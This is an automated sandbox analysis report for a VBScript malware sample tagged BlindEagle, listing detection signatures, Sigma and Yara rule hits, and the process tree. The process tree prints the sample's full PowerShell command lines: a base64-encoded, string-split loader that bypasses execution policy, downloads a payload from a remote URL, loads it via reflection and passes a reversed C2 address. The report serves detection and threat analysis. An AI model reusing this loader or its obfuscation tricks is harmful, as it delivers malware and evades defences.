Windows
Analysis Report
2THp7fwNQD.vbs
Overview
General Information
Sample name: | 2THp7fwNQD.vbs (renamed because original name is a hash value) |
Original sample name: | 2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177.vbs |
Analysis ID: | 1523825 |
MD5: | ae530aa8e50d1d20e9d0ec5ba8eaf303 |
SHA1: | 345200f8cc77dd41076b833f762a10de7f856758 |
SHA256: | 2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177 |
Tags: | BlindEagle, vbs, user-JAMESWT_MHT |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6376 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 6652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
System Summary
Source: | Author: Florian Roth (Nextron Systems) |